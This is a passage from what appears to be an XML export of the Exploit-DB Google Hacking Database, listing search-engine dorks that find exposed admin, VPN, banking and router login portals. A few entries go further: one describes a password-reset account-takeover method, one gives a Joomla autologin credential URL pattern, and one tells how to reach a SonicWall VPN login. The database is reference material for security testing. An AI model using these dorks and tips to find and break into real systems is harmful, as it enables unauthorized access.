<shortDescription>inurl:/admin.login.php</shortDescription>
<textualDescription>Login page :
inurl:/admin.login.php
site:*/admin.login.php
Reza Abasi(Turku)
</textualDescription>
<query>inurl:/admin.login.php</query>
<querystring>https://www.google.com/search?q=inurl:/admin.login.php</querystring>
<edb></edb>
<date>2019-08-19</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>5398</id>
<link>https://www.exploit-db.com/ghdb/5398</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:/admin/ intext:&quot;login&quot;</shortDescription>
<textualDescription>Login page :
inurl:/admin/ intext:&quot;login&quot;
Reza Abasi(Turku)
</textualDescription>
<query>inurl:/admin/ intext:&quot;login&quot;</query>
<querystring>https://www.google.com/search?q=inurl:/admin/ intext:&quot;login&quot;</querystring>
<edb></edb>
<date>2019-08-19</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>5399</id>
<link>https://www.exploit-db.com/ghdb/5399</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:/admin/admin.php intitle:&quot;login&quot;</shortDescription>
<textualDescription>Login page :
inurl:/admin/admin.php intitle:&quot;login&quot;
Reza Abasi(Turku)
</textualDescription>
<query>inurl:/admin/admin.php intitle:&quot;login&quot;</query>
<querystring>https://www.google.com/search?q=inurl:/admin/admin.php intitle:&quot;login&quot;</querystring>
<edb></edb>
<date>2019-08-19</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>7280</id>
<link>https://www.exploit-db.com/ghdb/7280</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:/admin/AdminLogin.jsp intitle:&quot;CERGY - Administration&quot;</shortDescription>
<textualDescription># Google Dork: inurl:/admin/AdminLogin.jsp intitle:&quot;CERGY - Administration&quot;
# Pages Containing Login Portals
# Date: 22/07/2021
# Exploit Author: Neha Singh
</textualDescription>
<query>inurl:/admin/AdminLogin.jsp intitle:&quot;CERGY - Administration&quot;</query>
<querystring>https://www.google.com/search?q=inurl:/admin/AdminLogin.jsp intitle:&quot;CERGY - Administration&quot;</querystring>
<edb></edb>
<date>2021-09-23</date>
<author>Neha Singh</author>
</entry>
<entry>
<id>5389</id>
<link>https://www.exploit-db.com/ghdb/5389</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:/admin/cal_login.php</shortDescription>
<textualDescription>Login page :
inurl:/admin/cal_login.php
Reza Abasi(Turku)
</textualDescription>
<query>inurl:/admin/cal_login.php</query>
<querystring>https://www.google.com/search?q=inurl:/admin/cal_login.php</querystring>
<edb></edb>
<date>2019-08-19</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>5263</id>
<link>https://www.exploit-db.com/ghdb/5263</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:/admin/index.php</shortDescription>
<textualDescription>Finding the admin login page:
inurl:/admin/index.php
inurl:/admin/index.php intitle:&quot;Login&quot;
Reza Abasi
</textualDescription>
<query>inurl:/admin/index.php</query>
<querystring>https://www.google.com/search?q=inurl:/admin/index.php</querystring>
<edb></edb>
<date>2019-06-19</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>5261</id>
<link>https://www.exploit-db.com/ghdb/5261</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:/admin/index.php?module=config</shortDescription>
<textualDescription>Finding the Mybb admin login page:
inurl:/admin/index.php?module=config
Reza Abasi
</textualDescription>
<query>inurl:/admin/index.php?module=config</query>
<querystring>https://www.google.com/search?q=inurl:/admin/index.php?module=config</querystring>
<edb></edb>
<date>2019-06-19</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>173</id>
<link>https://www.exploit-db.com/ghdb/173</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:/admin/login.asp</shortDescription>
<textualDescription>This is a typical login page. It has recently become a target for SQL injection. Comsec's article at http://www.governmentsecurity.org/articles/SQLinjectionBasicTutorial.php brought this to my attention.</textualDescription>
<query>inurl:/admin/login.asp</query>
<querystring>https://www.google.com/search?q=inurl%3A%2Fadmin%2Flogin.asp+</querystring>
<edb></edb>
<date>2004-04-21</date>
<author>anonymous</author>
</entry>
<entry>
<id>5291</id>
<link>https://www.exploit-db.com/ghdb/5291</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:/admin/login.php</shortDescription>
<textualDescription>Finding login page of php sites
inurl:/admin/login.php
Reza Abasi(Turku)
</textualDescription>
<query>inurl:/admin/login.php</query>
<querystring>https://www.google.com/search?q=inurl:/admin/login.php</querystring>
<edb></edb>
<date>2019-07-29</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>7444</id>
<link>https://www.exploit-db.com/ghdb/7444</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:/admin/login.php intitle: &quot;panel&quot;</shortDescription>
<textualDescription># Google Dork: inurl:/admin/login.php intitle: &quot;panel&quot;
# Pages Containing Login Portals
# Date: 14/10/2021
# Exploit Author: Roshdy Essam</textualDescription>
<query>inurl:/admin/login.php intitle: &quot;panel&quot;</query>
<querystring>https://www.google.com/search?q=inurl:/admin/login.php intitle: &quot;panel&quot;</querystring>
<edb></edb>
<date>2021-10-19</date>
<author>Roshdy Essam</author>
</entry>
<entry>
<id>7879</id>
<link>https://www.exploit-db.com/ghdb/7879</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:/admin/login.php intitle:(&quot;Iniciar sesion&quot; OR &quot;hacked&quot;)</shortDescription>
<textualDescription># Google Dork: inurl:/admin/login.php intitle:(&quot;Iniciar sesion&quot; OR &quot;hacked&quot;)
# Pages Containing Login Portals
# Date: 07/12/2021
# Exploit Author: David Bradette
Regards,
David Bradette
Information Technology Engineer
E: info@davidbradette.com mailto:info@davidbradette.com | W:http://www.davidbradette.com
Calgary, AB
</textualDescription>
<query>inurl:/admin/login.php intitle:(&quot;Iniciar sesion&quot; OR &quot;hacked&quot;)</query>
<querystring>https://www.google.com/search?q=inurl:/admin/login.php intitle:(&quot;Iniciar sesion&quot; OR &quot;hacked&quot;)</querystring>
<edb></edb>
<date>2022-06-16</date>
<author>David Bradette</author>
</entry>
<entry>
<id>7821</id>
<link>https://www.exploit-db.com/ghdb/7821</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:/admin/login.php intitle:(&quot;Iniciar sesion&quot; OR &quot;Login&quot;)</shortDescription>
<textualDescription># Google Dork: inurl:/admin/login.php intitle:(&quot;Iniciar sesion&quot; OR &quot;Login&quot;)
# Pages Containing Login Portals
# Date: 17/11/2021
# Exploit Author: Diego Bardalez Plaza
</textualDescription>
<query>inurl:/admin/login.php intitle:(&quot;Iniciar sesion&quot; OR &quot;Login&quot;)</query>
<querystring>https://www.google.com/search?q=inurl:/admin/login.php intitle:(&quot;Iniciar sesion&quot; OR &quot;Login&quot;)</querystring>
<edb></edb>
<date>2021-11-17</date>
<author>Diego Bardalez Plaza</author>
</entry>
<entry>
<id>3924</id>
<link>https://www.exploit-db.com/ghdb/3924</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:/administrator/index.php?autologin=1</shortDescription>
<textualDescription>Title: google hacking username and password of joomla
Google Dork: inurl:/administrator/index.php?autologin=1
Date: 2013-11-30
Author: Ashiyane Digital Security Team
Software Link: www.joomla.org/
Version: joomla 2.5
Location: /administrator/index.php?autologin=1&amp;passwd=[password]&amp;username=[username]</textualDescription>
<query>inurl:/administrator/index.php?autologin=1</query>
<querystring>https://www.google.com/search?q=inurl:/administrator/index.php?autologin=1</querystring>
<edb></edb>
<date>2013-12-03</date>
<author>anonymous</author>
</entry>
<entry>
<id>5302</id>
<link>https://www.exploit-db.com/ghdb/5302</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:/administrator/login.php</shortDescription>
<textualDescription># Exploit Title: Administrator Login
# Google Dork: inurl:/administrator/login.php
# Author: Francis Al Victoriano
</textualDescription>
<query>inurl:/administrator/login.php</query>
<querystring>https://www.google.com/search?q=inurl:/administrator/login.php</querystring>
<edb></edb>
<date>2019-07-30</date>
<author>Francis Al Victoriano</author>
</entry>
<entry>
<id>4190</id>
<link>https://www.exploit-db.com/ghdb/4190</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:/AirWatch/Login?</shortDescription>
<textualDescription>AirWatch Company.
Login/Trouble Logging In/ Back to Login Page / Don't remember your Username Login &quot;Errors&quot;
-Xploit</textualDescription>
<query>inurl:/AirWatch/Login?</query>
<querystring>https://www.google.com/search?q=inurl:/AirWatch/Login?</querystring>
<edb></edb>
<date>2016-01-29</date>
<author>anonymous</author>
</entry>
<entry>
<id>3792</id>
<link>https://www.exploit-db.com/ghdb/3792</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:/app_dev.php/login &quot;Environment&quot;</shortDescription>
<textualDescription>Search for login screen in web aplications developed with Symfony2 in a development environment
Daniel Maldonado
http://caceriadespammers.com.ar</textualDescription>
<query>inurl:/app_dev.php/login &quot;Environment&quot;</query>
<querystring>https://www.google.com/search?q=inurl:/app_dev.php/login &quot;Environment&quot;</querystring>
<edb></edb>
<date>2012-08-21</date>
<author>anonymous</author>
</entry>
<entry>
<id>4204</id>
<link>https://www.exploit-db.com/ghdb/4204</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:/AT-admin.cgi? intitle:login | private | employee | intranet | admin</shortDescription>
<textualDescription>inurl:/AT-admin.cgi? intitle:login | private | employee | intranet | admin
Pages containing login portals
Bruno Schmid
</textualDescription>
<query>inurl:/AT-admin.cgi? intitle:login | private | employee | intranet | admin</query>
<querystring>https://www.google.com/search?q=inurl:/AT-admin.cgi? intitle:login | private | employee | intranet | admin</querystring>
<edb></edb>
<date>2016-02-23</date>
<author>anonymous</author>
</entry>
<entry>
<id>5501</id>
<link>https://www.exploit-db.com/ghdb/5501</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:/awcuser*</shortDescription>
<textualDescription>An additional dork for finding Mitel login screens, previous presentations, and documents.
Author Name: MiningOmerta
</textualDescription>
<query>inurl:/awcuser*</query>
<querystring>https://www.google.com/search?q=inurl:/awcuser*</querystring>
<edb></edb>
<date>2019-09-04</date>
<author>MiningOmerta</author>
</entry>
<entry>
<id>4949</id>
<link>https://www.exploit-db.com/ghdb/4949</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:/banking.jsp?fldsegment=</shortDescription>
<textualDescription>[*] Description: Finds The Internet Banking Portals Which Are Running on
Oracle Flex-cube Core Banking Solutions.
[*] Google Dork: inurl:/banking.jsp?fldsegment=
[*] Author: Osman Arif</textualDescription>
<query>inurl:/banking.jsp?fldsegment=</query>
<querystring>https://www.google.com/search?q=inurl:/banking.jsp?fldsegment=</querystring>
<edb></edb>
<date>2018-09-13</date>
<author>Osman Arif</author>
</entry>
<entry>
<id>4149</id>
<link>https://www.exploit-db.com/ghdb/4149</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:/cgi-bin/MANGA/index.cgi</shortDescription>
<textualDescription>Description: This dork can access many login portal of big companies systems ( use this wisely. )
By Sivabalan ( CYBER GENIUS )..</textualDescription>
<query>inurl:/cgi-bin/MANGA/index.cgi</query>
<querystring>https://www.google.com/search?q=inurl:/cgi-bin/MANGA/index.cgi</querystring>
<edb></edb>
<date>2015-12-14</date>
<author>anonymous</author>
</entry>
<entry>
<id>412</id>
<link>https://www.exploit-db.com/ghdb/412</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:/cgi-bin/sqwebmail?noframes=1</shortDescription>
<textualDescription>sQWebmail login portals.</textualDescription>
<query>inurl:/cgi-bin/sqwebmail?noframes=1</query>
<querystring>https://www.google.com/search?q=inurl%3A%2Fcgi-bin%2Fsqwebmail%3Fnoframes%3D1</querystring>
<edb></edb>
<date>2004-08-06</date>
<author>anonymous</author>
</entry>
<entry>
<id>212</id>
<link>https://www.exploit-db.com/ghdb/212</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:/Citrix/Nfuse17/</shortDescription>
<textualDescription>These are Citrix Metaframe login portals. Attackers can use these to profile a site and can use insecure setups of this application to access the site.</textualDescription>
<query>inurl:/Citrix/Nfuse17/</query>
<querystring>https://www.google.com/search?q=inurl%3A%2FCitrix%2FNfuse17%2F+</querystring>
<edb></edb>
<date>2004-05-10</date>
<author>anonymous</author>
</entry>
<entry>
<id>5300</id>
<link>https://www.exploit-db.com/ghdb/5300</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:/client/login.php</shortDescription>
<textualDescription># Exploit Title: Client Login
# Google Dork: inurl:/client/login.php
# Author: Francis Al Victoriano
</textualDescription>
<query>inurl:/client/login.php</query>
<querystring>https://www.google.com/search?q=inurl:/client/login.php</querystring>
<edb></edb>
<date>2019-07-30</date>
<author>Francis Al Victoriano</author>
</entry>
<entry>
<id>5580</id>
<link>https://www.exploit-db.com/ghdb/5580</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:/clientlogin</shortDescription>
<textualDescription>Login Portals:
inurl:/clientlogin
Reza Abasi(Turku)
</textualDescription>
<query>inurl:/clientlogin</query>
<querystring>https://www.google.com/search?q=inurl:/clientlogin</querystring>
<edb></edb>
<date>2019-10-18</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>4834</id>
<link>https://www.exploit-db.com/ghdb/4834</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:/CMSPages/logon ext:aspx</shortDescription>
<textualDescription>Retrieve Administration logins of websites using Kentico CMS.
inurl:/cmsdesk intitle:CMS.Login
inurl:/CMSPages/logon ext:aspx intitle:CMS.Login
These two dorks also retrieve more logins of website which use Kentico CMS.
Author : Raj Kiran P
</textualDescription>
<query>inurl:/CMSPages/logon ext:aspx</query>
<querystring>https://www.google.com/search?q=inurl:/CMSPages/logon ext:aspx</querystring>
<edb></edb>
<date>2018-06-04</date>
<author>Raj Kiran P</author>
</entry>
<entry>
<id>5037</id>
<link>https://www.exploit-db.com/ghdb/5037</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:/config/authentication_page.htm</shortDescription>
<textualDescription>Cisco Switch Configuration Utility
ManhNho
</textualDescription>
<query>inurl:/config/authentication_page.htm</query>
<querystring>https://www.google.com/search?q=inurl:/config/authentication_page.htm</querystring>
<edb></edb>
<date>2018-11-27</date>
<author>ManhNho</author>
</entry>
<entry>
<id>4844</id>
<link>https://www.exploit-db.com/ghdb/4844</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:/contao/main ext:php -community -github</shortDescription>
<textualDescription>Retrieve login page of website that use Contao CMS.
Author: Raj Kiran P
</textualDescription>
<query>inurl:/contao/main ext:php -community -github</query>
<querystring>https://www.google.com/search?q=inurl:/contao/main ext:php -community -github</querystring>
<edb></edb>
<date>2018-06-05</date>
<author>Raj Kiran P</author>
</entry>
<entry>
<id>5579</id>
<link>https://www.exploit-db.com/ghdb/5579</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:/customerlogin</shortDescription>
<textualDescription>Login Portal:
inurl:/customerlogin
Reza Abasi(Turku)
</textualDescription>
<query>inurl:/customerlogin</query>
<querystring>https://www.google.com/search?q=inurl:/customerlogin</querystring>
<edb></edb>
<date>2019-10-18</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>5559</id>
<link>https://www.exploit-db.com/ghdb/5559</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:/dana-na/ filetype:cgi</shortDescription>
<textualDescription># Exploit Title: Pulse Secure SSL VPN
# Google Dork: inurl:/dana-na/ filetype:cgi
# Author: Francis Al Victoriano
</textualDescription>
<query>inurl:/dana-na/ filetype:cgi</query>
<querystring>https://www.google.com/search?q=inurl:/dana-na/ filetype:cgi</querystring>
<edb></edb>
<date>2019-09-27</date>
<author>Francis Al Victoriano</author>
</entry>
<entry>
<id>1435</id>
<link>https://www.exploit-db.com/ghdb/1435</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:/dana-na/auth/</shortDescription>
<textualDescription>Juniper SSL
Author: bugbear</textualDescription>
<query>inurl:/dana-na/auth/</query>
<querystring>https://www.google.com/search?q=inurl%3A%2Fdana-na%2Fauth%2F&amp;num=10&amp;ft=i&amp;cr=&amp;safe=images</querystring>
<edb></edb>
<date>2010-11-12</date>
<author>anonymous</author>
</entry>
<entry>
<id>6822</id>
<link>https://www.exploit-db.com/ghdb/6822</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:/dana-na/auth/url_default/welcome.cgi &quot;VPN&quot;</shortDescription>
<textualDescription># Google Dork: inurl:/dana-na/auth/url_default/welcome.cgi &quot;VPN&quot;
# VPN login portals.
# Date: 04/03/2021
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>inurl:/dana-na/auth/url_default/welcome.cgi &quot;VPN&quot;</query>
<querystring>https://www.google.com/search?q=inurl:/dana-na/auth/url_default/welcome.cgi &quot;VPN&quot;</querystring>
<edb></edb>
<date>2021-03-05</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>604</id>
<link>https://www.exploit-db.com/ghdb/604</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:/dana-na/auth/welcome.html</shortDescription>
<textualDescription>Neoteris Instant Virtual Extranet (IVE) has been reported prone to a cross-site scripting vulnerability.The issue presents itself, due to a lack of sufficient sanitization performed on an argument passed to an IVE CGI script. An attacker may exploit this vulnerability to hijack valid Neoteris IVE sessions.advisories: http://secunia.com/product/1558/http://www.securityfocus.com/bid/7510</textualDescription>
<query>inurl:/dana-na/auth/welcome.html</query>
<querystring>https://www.google.com/search?q=inurl%3A%2Fdana-na%2Fauth%2Fwelcome.html&amp;X=1&amp;filter=0</querystring>
<edb></edb>
<date>2004-10-20</date>
<author>anonymous</author>
</entry>
<entry>
<id>5923</id>
<link>https://www.exploit-db.com/ghdb/5923</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:/DeclaranetPlusWebapp/ intext:Entrar</shortDescription>
<textualDescription>Category: Pages Containing Login Portals
Nicholas Doropoulos
</textualDescription>
<query>inurl:/DeclaranetPlusWebapp/ intext:Entrar</query>
<querystring>https://www.google.com/search?q=inurl:/DeclaranetPlusWebapp/ intext:Entrar</querystring>
<edb></edb>
<date>2020-04-20</date>
<author>Nicholas Doropoulos</author>
</entry>
<entry>
<id>7477</id>
<link>https://www.exploit-db.com/ghdb/7477</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:/designs/imm/index.php</shortDescription>
<textualDescription># Google Dork: inurl:/designs/imm/index.php
# Pages Containing Login Portals
# Date:22/10/2021
# Exploit Author: César Hernández Obispo</textualDescription>
<query>inurl:/designs/imm/index.php</query>
<querystring>https://www.google.com/search?q=inurl:/designs/imm/index.php</querystring>
<edb></edb>
<date>2021-10-25</date>
<author>César Hernández Obispo</author>
</entry>
<entry>
<id>4259</id>
<link>https://www.exploit-db.com/ghdb/4259</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:/dynamic/login-simple.html?</shortDescription>
<textualDescription>inurl:/dynamic/login-simple.html?
This google dork can access many linksys Smart wifi accounts .
Created by Sivabalan ( CYBER GENIUS )</textualDescription>
<query>inurl:/dynamic/login-simple.html?</query>
<querystring>https://www.google.com/search?q=inurl:/dynamic/login-simple.html?</querystring>
<edb></edb>
<date>2016-04-11</date>
<author>anonymous</author>
</entry>
<entry>
<id>6006</id>
<link>https://www.exploit-db.com/ghdb/6006</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:/dynamic/login.html intext:&quot;Linksys Smart Wi-Fi Sign In&quot;</shortDescription>
<textualDescription>Category: Pages Containing Login Portals
Nicholas Doropoulos</textualDescription>
<query>inurl:/dynamic/login.html intext:&quot;Linksys Smart Wi-Fi Sign In&quot;</query>
<querystring>https://www.google.com/search?q=inurl:/dynamic/login.html intext:&quot;Linksys Smart Wi-Fi Sign In&quot;</querystring>
<edb></edb>
<date>2020-05-04</date>
<author>Nicholas Doropoulos</author>
</entry>
<entry>
<id>5449</id>
<link>https://www.exploit-db.com/ghdb/5449</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:/EasyPAY/view</shortDescription>
<textualDescription>Payroll management login pages
# Google Dork: inurl:/EasyPAY/view
# Date: [23-08-2019]
# Author: [Mohammed*_*]
</textualDescription>
<query>inurl:/EasyPAY/view</query>
<querystring>https://www.google.com/search?q=inurl:/EasyPAY/view</querystring>
<edb></edb>
<date>2019-08-26</date>
<author>Mohammed*_*</author>
</entry>
<entry>
<id>6652</id>
<link>https://www.exploit-db.com/ghdb/6652</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:/eftclient/account/login.htm</shortDescription>
<textualDescription># Exploit Title: *inurl:/eftclient/account/login.htm*
# Google Dork: *inurl:/eftclient/account/login.htm*
# Enhanced File Transfer (EFT) Login portal. EFT from Globalscape is an advanced, powerful managed file transfer (MFT) solution.
# Dork Author: Sajan Dhakate
*Thanks &amp; Regards*
*Sajan Dhakate*
</textualDescription>
<query>inurl:/eftclient/account/login.htm</query>
<querystring>https://www.google.com/search?q=inurl:/eftclient/account/login.htm</querystring>
<edb></edb>
<date>2020-11-04</date>
<author>Sajan Dhakate</author>
</entry>
<entry>
<id>5306</id>
<link>https://www.exploit-db.com/ghdb/5306</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:/employee/login.php</shortDescription>
<textualDescription># Exploit Title: Employee Login Page
# Google Dork: inurl:/employee/login.php
# Author: Francis Al Victoriano
</textualDescription>
<query>inurl:/employee/login.php</query>
<querystring>https://www.google.com/search?q=inurl:/employee/login.php</querystring>
<edb></edb>
<date>2019-07-30</date>
<author>Francis Al Victoriano</author>
</entry>
<entry>
<id>6093</id>
<link>https://www.exploit-db.com/ghdb/6093</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:/emptyView4.html</shortDescription>
<textualDescription>#Author: MiningOmerta
#Finds outdated and publicly exposed Sonicwall Firewalls. If one erases emptyView4.html once at the website and instead uses
# the less indexed http://site/auth1.html, it will typically show the Perimeter Firewall login page
# from the link on that page you can navigate to https://site/sslvpnLogin.html which will usually to domain VPN login with domain(s) name listed in the dropdown.
Dork:
inurl:/emptyView4.html
</textualDescription>
<query>inurl:/emptyView4.html</query>
<querystring>https://www.google.com/search?q=inurl:/emptyView4.html</querystring>
<edb></edb>
<date>2020-05-18</date>
<author>MiningOmerta</author>
</entry>
<entry>
<id>5278</id>
<link>https://www.exploit-db.com/ghdb/5278</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:/en-US/account/login?return_to=</shortDescription>
<textualDescription># Google Search: inurl:/en-US/account/login?return_to=
# Google Dork Description: [Servers that running Splunk Enterprise (SIEM)]
# Date: [12-July-2019]
# Exploit Author: [Zayed AlJaberi]
# Vendor Homepage: [https://www.splunk.com/]
</textualDescription>
<query>inurl:/en-US/account/login?return_to=</query>
<querystring>https://www.google.com/search?q=inurl:/en-US/account/login?return_to=</querystring>
<edb></edb>
<date>2019-07-15</date>
<author>Zayed AlJaberi</author>
</entry>
<entry>
<id>263</id>
<link>https://www.exploit-db.com/ghdb/263</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:/eprise/</shortDescription>
<textualDescription>silkRoad Eprise is a dynamic content management product that simplifies the flow of content to a corporate website. The software requires NT 4, Windows 2000 or Solaris and is used by high-profile corporations. If an attacker cuts the url after the eprise/ directory, he is presented with the admin logon screen.</textualDescription>
<query>inurl:/eprise/</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;q=inurl%3A%2Feprise%2F+</querystring>
<edb></edb>
<date>2004-05-26</date>
<author>anonymous</author>
</entry>
<entry>
<id>5832</id>
<link>https://www.exploit-db.com/ghdb/5832</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:/forgotpassword intext:&quot;enter username and email&quot;</shortDescription>
<textualDescription># Google Dork: inurl:/forgotpassword intext:&quot;enter username and email&quot;
# The search results found from this dork, are potentially vulnerable sites
to account takeover. If attacker inserts victim's username along with
attacker's email address, than attacker might receive password reset link
or code for the target user on his(attacker) own mail. Or, if attacker
attempts password reset for his own account, then intercept and modifies
the http request body with victim credentials(i.e. username, email), than
he might successfully reach victim's password reset page. Using these two
methods, attacker might be able to takeover any user account.
# Date: 25/03/2020
# Author: Rafin Rahman Chowdhury
</textualDescription>
<query>inurl:/forgotpassword intext:&quot;enter username and email&quot;</query>
<querystring>https://www.google.com/search?q=inurl:/forgotpassword intext:&quot;enter username and email&quot;</querystring>
<edb></edb>
<date>2020-03-26</date>
<author>Rafin Rahman Chowdhury</author>
</entry>
<entry>
<id>4671</id>
<link>https://www.exploit-db.com/ghdb/4671</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:/frontend/paper_lantern/index.html</shortDescription>
<textualDescription>inurl:/frontend/paper_lantern/index.html
This Dork is useful to search and find CPANEL login
</textualDescription>
<query>inurl:/frontend/paper_lantern/index.html</query>
<querystring>https://www.google.com/search?q=inurl:/frontend/paper_lantern/index.html</querystring>
<edb></edb>
<date>2018-02-14</date>
<author>Nisankh Acharjya</author>
</entry>
<entry>
<id>5094</id>
<link>https://www.exploit-db.com/ghdb/5094</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:/FxCodeShell.jsp/ &quot;Login Form&quot; &quot;Blog Comments&quot;</shortDescription>
<textualDescription>Category : Pages containing login portals
Description : Dork for finding login portals of fxcodeshell.jsp
Dork : inurl:/FxCodeShell.jsp/ &quot;Login Form&quot; &quot;Blog Comments&quot;
Also try : inurl:/FxCodeShell.jsp::$DATA/
Date : 10/2/2019
Author : Manish Bhandarkar
</textualDescription>
<query>inurl:/FxCodeShell.jsp/ &quot;Login Form&quot; &quot;Blog Comments&quot;</query>
<querystring>https://www.google.com/search?q=inurl:/FxCodeShell.jsp/ &quot;Login Form&quot; &quot;Blog Comments&quot;</querystring>
<edb></edb>
<date>2019-02-11</date>
<author>Manish Bhandarkar</author>
</entry>
<entry>
<id>5876</id>
<link>https://www.exploit-db.com/ghdb/5876</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:/global-protect/login.esp</shortDescription>
<textualDescription># Dork #
inurl:/global-protect/login.esp
Login Portals.
</textualDescription>
<query>inurl:/global-protect/login.esp</query>
<querystring>https://www.google.com/search?q=inurl:/global-protect/login.esp</querystring>
<edb></edb>
<date>2020-04-16</date>
<author>Debashis Pal</author>
</entry>
<entry>
<id>5301</id>
<link>https://www.exploit-db.com/ghdb/5301</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:/guest/login.php</shortDescription>
<textualDescription># Exploit Title: Guest Login
# Google Dork: inurl:/guest/login.php
# Author: Francis Al Victoriano
</textualDescription>
<query>inurl:/guest/login.php</query>
<querystring>https://www.google.com/search?q=inurl:/guest/login.php</querystring>
<edb></edb>
<date>2019-07-30</date>
<author>Francis Al Victoriano</author>
</entry>
<entry>
<id>4494</id>
<link>https://www.exploit-db.com/ghdb/4494</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:/helpdesk/staff/index.php?</shortDescription>
<textualDescription>Google dork to find &quot; Kayako software-ticketing portal login page&quot;
Gogle dork :* inurl:/helpdesk/staff/index.php?*
*Regards,*
*Dagalti kick*</textualDescription>
<query>inurl:/helpdesk/staff/index.php?</query>
<querystring>https://www.google.com/search?q=inurl:/helpdesk/staff/index.php?</querystring>
<edb></edb>
<date>2017-05-22</date>
<author>anonymous</author>
</entry>
<entry>
<id>4332</id>
<link>https://www.exploit-db.com/ghdb/4332</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:/human.aspx?r=</shortDescription>
<textualDescription>Secure ftp server Logins
Hosted by &quot;moveit&quot; company
Big businesses.
Also inurl:/human?=arg12
-Xploit</textualDescription>
<query>inurl:/human.aspx?r=</query>
<querystring>https://www.google.com/search?q=inurl:/human.aspx?r=</querystring>
<edb></edb>
<date>2016-09-23</date>
<author>anonymous</author>
</entry>
<entry>
<id>5456</id>
<link>https://www.exploit-db.com/ghdb/5456</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:/identify/ intitle:&quot;Forgotten Password&quot;</shortDescription>
<textualDescription>Login Pages:
inurl:/identify/ intitle:&quot;Forgotten Password&quot;
Reza Abasi(Turku)
</textualDescription>
<query>inurl:/identify/ intitle:&quot;Forgotten Password&quot;</query>
<querystring>https://www.google.com/search?q=inurl:/identify/ intitle:&quot;Forgotten Password&quot;</querystring>
<edb></edb>
<date>2019-08-27</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>4950</id>
<link>https://www.exploit-db.com/ghdb/4950</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:/INALogin.jsp</shortDescription>
<textualDescription>[*] Description: Finds The Internet Banking Backend Administrator Portals
Running on Oracle Flex-cube Core Banking Solutions.
[*] Google Dork: inurl:/INALogin.jsp
[*] Author: Osman Arif
</textualDescription>
<query>inurl:/INALogin.jsp</query>
<querystring>https://www.google.com/search?q=inurl:/INALogin.jsp</querystring>
<edb></edb>
<date>2018-09-13</date>
<author>Osman Arif</author>
</entry>
<entry>
<id>5308</id>
<link>https://www.exploit-db.com/ghdb/5308</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:/index.aspx/login</shortDescription>
<textualDescription>inurl:/index.aspx/login
inurl:&quot;/index.aspx?login=&quot; intitle:&quot;Login&quot;
Reza Abasi(Turku)
</textualDescription>
<query>inurl:/index.aspx/login</query>
<querystring>https://www.google.com/search?q=inurl:/index.aspx/login</querystring>
<edb></edb>
<date>2019-07-31</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>5465</id>
<link>https://www.exploit-db.com/ghdb/5465</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:/index.php/admin/ intitle:&quot;login&quot;</shortDescription>
<textualDescription>Login Portal:
inurl:/index.php/admin/ intitle:&quot;login&quot;
